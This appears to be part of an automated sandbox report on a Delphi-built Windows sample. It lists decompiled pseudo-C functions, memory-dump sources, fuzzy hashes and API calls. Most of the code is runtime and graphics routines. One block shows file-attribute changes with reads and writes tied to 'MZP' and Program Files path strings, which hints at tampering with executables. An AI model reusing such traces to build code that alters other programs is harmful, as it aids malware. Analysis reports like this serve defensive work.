                                                                                                                          								}
                                                                                                                          								_pop(_t75);
                                                                                                                          								_push(_t75);
                                                                                                                          								_push(E00406268(_t75) *  *(_t115 + 0x18));
                                                                                                                          								_t78 = E00402448(E00406268(_t75) *  *(_t115 + 0x18));
                                                                                                                          								_push(_t78);
                                                                                                                          								_push(0);
                                                                                                                          								_push(_v12);
                                                                                                                          								_push(_t78);
                                                                                                                          								_t79 =  *(_t115 + 0x18);
                                                                                                                          								__eflags = _t79 - _t142;
                                                                                                                          								if(__eflags > 0) {
                                                                                                                          									_t79 = _t142;
                                                                                                                          								}
                                                                                                                          								_t82 = GetDIBits(_v8, E00406154(_t115, __eflags), 0, _t79, ??, ??, ??);
                                                                                                                          								_t132 =  *(_t115 + 0x18);
                                                                                                                          								__eflags = _t132 - _t142;
                                                                                                                          								if(_t132 > _t142) {
                                                                                                                          									_t132 = _t142;
                                                                                                                          								}
                                                                                                                          								__eflags = _t82 - _t132;
                                                                                                                          								if(__eflags != 0) {
                                                                                                                          									_pop(_t88);
                                                                                                                          									E00402468(_t88);
                                                                                                                          									_push(0);
                                                                                                                          									_push(0);
                                                                                                                          									_push(0);
                                                                                                                          									_push(_t149);
                                                                                                                          									_push(0);
                                                                                                                          									_push(_v40);
                                                                                                                          									_push(_v36);
                                                                                                                          									L00404110();
                                                                                                                          									_t144 = _t144 ^ 0xffffffff;
                                                                                                                          									_t147 = 0;
                                                                                                                          									_t92 = SelectObject(_v60, 0);
                                                                                                                          									_t132 = _v68;
                                                                                                                          									__eflags = 0;
                                                                                                                          									E00406094(_t115, 0, _v68, 0, 0);
                                                                                                                          									SelectObject(_v72, _t92);
                                                                                                                          								}
                                                                                                                          								E00406024(_t115, _t115, _t132, __eflags);
                                                                                                                          								_pop( *_t51);
                                                                                                                          								_pop( *_t52);
                                                                                                                          								_pop( *_t53);
                                                                                                                          								 *(_t115 + 0x20) = _t147;
                                                                                                                          								__eflags = _t144;
                                                                                                                          								 *(_t115 + 0x72) = 0;
                                                                                                                          								if(_t144 < 0) {
                                                                                                                          									_t56 = _t115 + 0x72;
                                                                                                                          									 *_t56 =  &( *(_t115 + 0x72)->i);
                                                                                                                          									__eflags =  *_t56;
                                                                                                                          								}
                                                                                                                          								goto L25;
                                                                                                                          							} else {
                                                                                                                          								_push(0);
                                                                                                                          								L00404178();
                                                                                                                          								_push(_t69);
                                                                                                                          								_push( *(_t115 + 0x18));
                                                                                                                          								_push( *((intOrPtr*)(_t115 + 0x1c)));
                                                                                                                          								_push(_t69);
                                                                                                                          								L00404100();
                                                                                                                          								_t148 = _t69;
                                                                                                                          								L00404190();
                                                                                                                          								_t135 = 0;
                                                                                                                          								_push(_t135);
                                                                                                                          								_push(SelectObject(_t135, _t148));
                                                                                                                          								_push( *(_t115 + 0x18));
                                                                                                                          								_push( *((intOrPtr*)(_t115 + 0x1c)));
                                                                                                                          								_push(0);
                                                                                                                          								_t101 = CreateSolidBrush(E0040469C( *((intOrPtr*)(_t115 + 0x2c))));
                                                                                                                          								_t136 = _t149;
                                                                                                                          								FillRect(_v44, _t149, _t101);
                                                                                                                          								DeleteObject(_t101);
                                                                                                                          								asm("jecxz 0x24");
                                                                                                                          								SelectObject(_v60, 0);
                                                                                                                          								SetDIBits(_v68, _t148, 0,  *(_t115 + 0x18),  *(_t115 + 0x41),  *(_t115 + 0x3d), 0);
                                                                                                                          								E00406024(_t115, _t115, _t136, __eflags);
                                                                                                                          								 *(_t115 + 0x20) = _t148;
                                                                                                                          								L25:
                                                                                                                          								asm("jecxz 0xa");
                                                                                                                          								_pop(_t133);
                                                                                                                          								 *((intOrPtr*)( *((intOrPtr*)(_t115 + 0x4a))))(_t133);
                                                                                                                          								_t87 = DeleteDC(_t142);
                                                                                                                          								asm("popad");
                                                                                                                          								return _t87;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						return _t66;
                                                                                                                          					} else {
                                                                                                                          						return _t64;
                                                                                                                          					}
                                                                                                                          				} else {
                                                                                                                          					_push(__edx);
                                                                                                                          					_t64 = E0040648C(_t113, __edx);
                                                                                                                          					_pop(_t137);
                                                                                                                          					if(_t64 == _t137) {
                                                                                                                          						goto L7;
                                                                                                                          					} else {
                                                                                                                          						_t108 = _t113;
                                                                                                                          						if(_t137 != 0) {
                                                                                                                          							 *(_t113 + 0x49) = _t137;
                                                                                                                          							__eflags = _t137 - 5;
                                                                                                                          							if(_t137 == 5) {
                                                                                                                          								_t137 = _t137 - 1;
                                                                                                                          								__eflags = _t137;
                                                                                                                          							}
                                                                                                                          							L27();
                                                                                                                          							_t111 = E00405F98( *( *((intOrPtr*)(_t113 + 0x3d)) + 0xe) & 0x0000ffff, 0);
                                                                                                                          							_t139 = _t137;
                                                                                                                          							__eflags = _t111 - _t139;
                                                                                                                          							_t64 = _t113;
                                                                                                                          							goto L7;
                                                                                                                          						} else {
                                                                                                                          							_t140 =  &(_t137->i);
                                                                                                                          							if(_t140 !=  *(_t108 + 0x3c)) {
                                                                                                                          								 *(_t108 + 0x3c) = _t140;
                                                                                                                          								L9();
                                                                                                                          								return _t108;
                                                                                                                          							}
                                                                                                                          							return _t108;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          			}







































                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: ba240bc75a83fef15349861cf5e056242dc807168d5e068429e02be0b81ae198
                                                                                                                          • Instruction ID: ab27ac02cf2ee968932468d3d4c2958694adf508222a5702edd9c4bd71c6629c
                                                                                                                          • Opcode Fuzzy Hash: ba240bc75a83fef15349861cf5e056242dc807168d5e068429e02be0b81ae198
                                                                                                                          • Instruction Fuzzy Hash: A73184B12002006FDB04BF658C85F2A3A69AFD4314F5244BEBA06BF2D7D639DCA1975C
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 7f5595bea6b46ab1a6bb8acb478b4169ff457dd0ad7d021d976c048766c6e429
                                                                                                                          • Instruction ID: 4cf276d7622785da586c8009362eb5643f0905aac9be693976ada0e9182b1a0c
                                                                                                                          • Opcode Fuzzy Hash: 7f5595bea6b46ab1a6bb8acb478b4169ff457dd0ad7d021d976c048766c6e429
                                                                                                                          • Instruction Fuzzy Hash: 7E3102706041006FDB24AF65CC82F2A3A6AAF84308F5144BFB901BF6DBC63DDC499758
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 00410198
                                                                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 004101B7
                                                                                                                          • GetObjectA.GDI32(00000000,00000018,?), ref: 00410221
                                                                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 00410356
                                                                                                                          • CopyImage.USER32 ref: 0041040F
                                                                                                                          • CopyImage.USER32 ref: 00410496
                                                                                                                          • CopyImage.USER32 ref: 004101EA
                                                                                                                            • Part of subcall function 0040FC78: GetObjectA.GDI32(00000000,00000018), ref: 0040FC8A
                                                                                                                            • Part of subcall function 0040FBEC: 73BBAC50.USER32(00000000,?,?,?,?,?,?,?,?,0040FBC8), ref: 0040FC0F
                                                                                                                            • Part of subcall function 0040FBEC: 73BBA7A0.GDI32(00000000,?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0040FBC8), ref: 0040FC2A
                                                                                                                            • Part of subcall function 0040FBEC: 73BBB380.USER32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?), ref: 0040FC35
                                                                                                                          • CopyImage.USER32 ref: 0041052B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Object$CopyImage$B380
                                                                                                                          • String ID: (
                                                                                                                          • API String ID: 1117845954-3887548279
                                                                                                                          • Opcode ID: 39a78b10d7024776e478eb120b2c750533621c1c387b0d6abdafb054a84c2d99
                                                                                                                          • Instruction ID: a4bd64b3fd63d48472c9145484328d1e8b73c1e654bc960fa13628ff834bc38b
                                                                                                                          • Opcode Fuzzy Hash: 39a78b10d7024776e478eb120b2c750533621c1c387b0d6abdafb054a84c2d99
                                                                                                                          • Instruction Fuzzy Hash: 05E15134E002189BDB20EBA9C885BDEB7B5AF48314F50807BF505F7382DA799D85CB59
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • GetFileAttributesA.KERNEL32(00000000,00000000,Function_0000748C), ref: 00410DB0
                                                                                                                          • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,Function_0000748C), ref: 00410DC2
                                                                                                                            • Part of subcall function 0040E600: CreateFileA.KERNEL32(?,40000400,40000400,00000000,40000400,40000400,00000000,0040E6CC,00000000,Function_00004C66), ref: 0040E620
                                                                                                                          • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,Function_0000748C), ref: 00410EF9
                                                                                                                            • Part of subcall function 0040E65C: ReadFile.KERNEL32(00000000,?,?,?,00000000,00000000,?,0040E75F,00000000,Function_00004CE6), ref: 0040E667
                                                                                                                            • Part of subcall function 0040E64C: SetFilePointer.KERNEL32(00000000,000003E8,00000000,?,00410C11,00000000,Function_000071BF), ref: 0040E654
                                                                                                                            • Part of subcall function 0040E678: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040E682
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Attributes$CreatePointerReadWrite
                                                                                                                          • String ID: M$MZP$Z$\PROGRA~1\
                                                                                                                          • API String ID: 997383822-4093836345
                                                                                                                          • Opcode ID: 0ffbdbd9c4ce7faddcbce69822ed9a4bb391a8709582c286f98777811686da55
                                                                                                                          • Instruction ID: 2f0480c31d9fc6f6f6bd4ff7e20304d554dec23e4d9677c87e7e87a18c1bd8bd
                                                                                                                          • Opcode Fuzzy Hash: 0ffbdbd9c4ce7faddcbce69822ed9a4bb391a8709582c286f98777811686da55
                                                                                                                          • Instruction Fuzzy Hash: B1515570B003089BDB14FB6ECC8269EB3659F55308F5089BBB404B73D2DA7D9E854B59
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040C2A0: GetKeyboardType.USER32 ref: 0040C2A5
                                                                                                                            • Part of subcall function 0040C2A0: GetKeyboardType.USER32 ref: 0040C2B1
                                                                                                                          • GetCommandLineA.KERNEL32 ref: 0040D87B
                                                                                                                          • GetVersion.KERNEL32 ref: 0040D88F
                                                                                                                          • GetVersion.KERNEL32 ref: 0040D8A0
                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0040D8DC
                                                                                                                            • Part of subcall function 0040C2D0: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C2F2
                                                                                                                            • Part of subcall function 0040C2D0: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C325
                                                                                                                            • Part of subcall function 0040C2D0: RegCloseKey.ADVAPI32(?,004028B0,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C33B
                                                                                                                          • GetThreadLocale.KERNEL32 ref: 0040D8BC
                                                                                                                            • Part of subcall function 0040D74C: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00403D1A), ref: 0040D772
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                                                                                                          • String ID: 8$S
                                                                                                                          • API String ID: 3734044017-3602091218
                                                                                                                          • Opcode ID: 0632ebee869107818fc617476dd3b707cbc1511b343300be66bfea40396029a6
                                                                                                                          • Instruction ID: 917de0a484455ad82c20158439a2a24f06621c5804a29fc775aa2cf17b207d74
                                                                                                                          • Opcode Fuzzy Hash: 0632ebee869107818fc617476dd3b707cbc1511b343300be66bfea40396029a6
                                                                                                                          • Instruction Fuzzy Hash: F10129B1C113449AE711BFB1AA463193A60AB1130CF10857FD151762E2EB7D00A8DB6F
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00403D7D(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
                                                                                                                          				long _t11;
                                                                                                                          				void* _t16;
                                                                                                                          
                                                                                                                          				_t16 = __ebx;
                                                                                                                          				 *__edi =  *__edi + __ecx;
                                                                                                                          				 *((intOrPtr*)(__eax - 0x40a5a4)) =  *((intOrPtr*)(__eax - 0x40a5a4)) + __eax - 0x40a5a4;
                                                                                                                          				 *0x40900c = 2;
                                                                                                                          				 *0x40a010 = 0x401008;
                                                                                                                          				 *0x40a014 = 0x401010;
                                                                                                                          				 *0x40a036 = 2;
                                                                                                                          				 *0x40a000 = E00403960;
                                                                                                                          				if(E00402808() != 0) {
                                                                                                                          					_t3 = E00402838();
                                                                                                                          				}
                                                                                                                          				E004028FC(_t3);
                                                                                                                          				 *0x40a03c = 0xd7b0;
                                                                                                                          				 *0x40a208 = 0xd7b0;
                                                                                                                          				 *0x40a3d4 = 0xd7b0;
                                                                                                                          				 *0x40a02c = GetCommandLineA();
                                                                                                                          				 *0x40a028 = E00401098();
                                                                                                                          				if((GetVersion() & 0x80000000) == 0x80000000) {
                                                                                                                          					 *0x40a5a8 = E00403CB4(GetThreadLocale(), _t16, __eflags);
                                                                                                                          				} else {
                                                                                                                          					if((GetVersion() & 0x000000ff) <= 4) {
                                                                                                                          						 *0x40a5a8 = E00403CB4(GetThreadLocale(), _t16, __eflags);
                                                                                                                          					} else {
                                                                                                                          						 *0x40a5a8 = 3;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				_t11 = GetCurrentThreadId();
                                                                                                                          				 *0x40a020 = _t11;
                                                                                                                          				return _t11;
                                                                                                                          			}






                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00402808: GetKeyboardType.USER32 ref: 0040280D
                                                                                                                            • Part of subcall function 00402808: GetKeyboardType.USER32 ref: 00402819
                                                                                                                          • GetCommandLineA.KERNEL32 ref: 00403DE3
                                                                                                                          • GetVersion.KERNEL32 ref: 00403DF7
                                                                                                                          • GetVersion.KERNEL32 ref: 00403E08
                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00403E44
                                                                                                                            • Part of subcall function 00402838: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040285A
                                                                                                                            • Part of subcall function 00402838: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040288D
                                                                                                                            • Part of subcall function 00402838: RegCloseKey.ADVAPI32(?,004028B0,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 004028A3
                                                                                                                          • GetThreadLocale.KERNEL32 ref: 00403E24
                                                                                                                            • Part of subcall function 00403CB4: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00403D1A), ref: 00403CDA
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                                                                                                          • String ID: 8$S
                                                                                                                          • API String ID: 3734044017-3602091218
                                                                                                                          • Opcode ID: 0632ebee869107818fc617476dd3b707cbc1511b343300be66bfea40396029a6
                                                                                                                          • Instruction ID: 4e42c8c4ff7c9e6347351f52ed3844a5f6dcad7449c2d11acc3bcf8107044070
                                                                                                                          • Opcode Fuzzy Hash: 0632ebee869107818fc617476dd3b707cbc1511b343300be66bfea40396029a6
                                                                                                                          • Instruction Fuzzy Hash: 7B016DB180438599E710BF72AA4A3193E64AB11309F10853FA080BA3F3D77D06989B6F
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0040CA7E,?,?,?,?,?,?,?,0040CB1E,0040BF7B), ref: 0040C9E9
                                                                                                                          • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0040CA7E,?,?,?,?,?,?,?,0040CB1E), ref: 0040C9EF
                                                                                                                          • GetStdHandle.KERNEL32(000000F5,Function_00002FA0,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0040CA7E), ref: 0040CA04
                                                                                                                          • WriteFile.KERNEL32(00000000,000000F5,Function_00002FA0,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0040CA7E), ref: 0040CA0A
                                                                                                                          • MessageBoxA.USER32 ref: 0040CA28
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileHandleWrite$Message
                                                                                                                          • String ID: Error$Runtime error at 00000000
                                                                                                                          • API String ID: 1570097196-2970929446
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 79%
                                                                                                                          			E00402F18(void* __ecx) {
                                                                                                                          				long _v4;
                                                                                                                          				int _t3;
                                                                                                                          
                                                                                                                          				if( *0x40a034 == 0) {
                                                                                                                          					if( *0x409024 == 0) {
                                                                                                                          						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
                                                                                                                          					}
                                                                                                                          					return _t3;
                                                                                                                          				} else {
                                                                                                                          					if( *0x40a208 == 0xd7b2 &&  *0x40a210 > 0) {
                                                                                                                          						 *0x40a220();
                                                                                                                          					}
                                                                                                                          					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
                                                                                                                          					return WriteFile(GetStdHandle(0xfffffff5), E00402FA0, 2,  &_v4, 0);
                                                                                                                          				}
                                                                                                                          			}






                                                                                                                          APIs
                                                                                                                          • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00402FE6,?,00000000,?,00000001,00403086,004024E3,0040252B,00000000,00000000), ref: 00402F51
                                                                                                                          • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00402FE6,?,00000000,?,00000001,00403086,004024E3,0040252B,00000000), ref: 00402F57
                                                                                                                          • GetStdHandle.KERNEL32(000000F5,00402FA0,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00402FE6,?,00000000), ref: 00402F6C
                                                                                                                          • WriteFile.KERNEL32(00000000,000000F5,00402FA0,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00402FE6,?,00000000), ref: 00402F72
                                                                                                                          • MessageBoxA.USER32 ref: 00402F90
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileHandleWrite$Message
                                                                                                                          • String ID: Error$Runtime error at 00000000
                                                                                                                          • API String ID: 1570097196-2970929446
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 72%
                                                                                                                          			E0040184C() {
                                                                                                                          				void* _t2;
                                                                                                                          				void* _t3;
                                                                                                                          				void* _t14;
                                                                                                                          				intOrPtr* _t19;
                                                                                                                          				intOrPtr _t23;
                                                                                                                          				intOrPtr _t26;
                                                                                                                          				intOrPtr _t28;
                                                                                                                          
                                                                                                                          				_t26 = _t28;
                                                                                                                          				if( *0x40a5ac == 0) {
                                                                                                                          					return _t2;
                                                                                                                          				} else {
                                                                                                                          					_push(_t26);
                                                                                                                          					_push(E00401922);
                                                                                                                          					_push( *[fs:edx]);
                                                                                                                          					 *[fs:edx] = _t28;
                                                                                                                          					if( *0x40a035 != 0) {
                                                                                                                          						_push(0x40a5b4);
                                                                                                                          						L004010E4();
                                                                                                                          					}
                                                                                                                          					 *0x40a5ac = 0;
                                                                                                                          					_t3 =  *0x40a60c; // 0x0
                                                                                                                          					LocalFree(_t3);
                                                                                                                          					 *0x40a60c = 0;
                                                                                                                          					_t19 =  *0x40a5d4; // 0x40a5d4
                                                                                                                          					while(_t19 != 0x40a5d4) {
                                                                                                                          						_t1 = _t19 + 8; // 0x0
                                                                                                                          						VirtualFree( *_t1, 0, 0x8000);
                                                                                                                          						_t19 =  *_t19;
                                                                                                                          					}
                                                                                                                          					E0040114C(0x40a5d4);
                                                                                                                          					E0040114C(0x40a5e4);
                                                                                                                          					E0040114C(0x40a610);
                                                                                                                          					_t14 =  *0x40a5cc; // 0x0
                                                                                                                          					while(_t14 != 0) {
                                                                                                                          						 *0x40a5cc =  *_t14;
                                                                                                                          						LocalFree(_t14);
                                                                                                                          						_t14 =  *0x40a5cc; // 0x0
                                                                                                                          					}
                                                                                                                          					_pop(_t23);
                                                                                                                          					 *[fs:eax] = _t23;
                                                                                                                          					_push(0x401929);
                                                                                                                          					if( *0x40a035 != 0) {
                                                                                                                          						_push(0x40a5b4);
                                                                                                                          						L004010EC();
                                                                                                                          					}
                                                                                                                          					_push(0x40a5b4);
                                                                                                                          					L004010F4();
                                                                                                                          					return 0;
                                                                                                                          				}
                                                                                                                          			}











                                                                                                                          APIs
                                                                                                                          • RtlEnterCriticalSection.KERNEL32(0040A5B4,00000000,00401922), ref: 00401879
                                                                                                                          • LocalFree.KERNEL32(00000000,00000000,00401922), ref: 0040188B
                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00401922), ref: 004018AA
                                                                                                                          • LocalFree.KERNEL32(00000000,00000000,00000000,00008000,00000000,00000000,00401922), ref: 004018E9
                                                                                                                          • RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401929,00000000,00000000,00401922), ref: 00401912
                                                                                                                          • RtlDeleteCriticalSection.KERNEL32(0040A5B4,00401929,00000000,00000000,00401922), ref: 0040191C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3782394904-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • RtlEnterCriticalSection.KERNEL32(0040A5B4,00000000,00401922), ref: 0040B311
                                                                                                                          • LocalFree.KERNEL32(00000000,00000000,00401922), ref: 0040B323
                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00401922), ref: 0040B342
                                                                                                                          • LocalFree.KERNEL32(00000000,00000000,00000000,00008000,00000000,00000000,00401922), ref: 0040B381
                                                                                                                          • RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401929,00000000,00000000,00401922), ref: 0040B3AA
                                                                                                                          • RtlDeleteCriticalSection.KERNEL32(0040A5B4,00401929,00000000,00000000,00401922), ref: 0040B3B4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3782394904-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 65%
                                                                                                                          			E00402838() {
                                                                                                                          				void* _v8;
                                                                                                                          				char _v12;
                                                                                                                          				int _v16;
                                                                                                                          				signed short _t12;
                                                                                                                          				signed short _t14;
                                                                                                                          				intOrPtr _t27;
                                                                                                                          				void* _t29;
                                                                                                                          				void* _t31;
                                                                                                                          				intOrPtr _t32;
                                                                                                                          
                                                                                                                          				_t29 = _t31;
                                                                                                                          				_t32 = _t31 + 0xfffffff4;
                                                                                                                          				_v12 =  *0x409018 & 0x0000ffff;
                                                                                                                          				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
                                                                                                                          					_t12 =  *0x409018; // 0x1332
                                                                                                                          					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
                                                                                                                          					 *0x409018 = _t14;
                                                                                                                          					return _t14;
                                                                                                                          				} else {
                                                                                                                          					_push(_t29);
                                                                                                                          					_push(E004028A9);
                                                                                                                          					_push( *[fs:eax]);
                                                                                                                          					 *[fs:eax] = _t32;
                                                                                                                          					_v16 = 4;
                                                                                                                          					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
                                                                                                                          					_pop(_t27);
                                                                                                                          					 *[fs:eax] = _t27;
                                                                                                                          					_push(0x4028b0);
                                                                                                                          					return RegCloseKey(_v8);
                                                                                                                          				}
                                                                                                                          			}













                                                                                                                          APIs
                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040285A
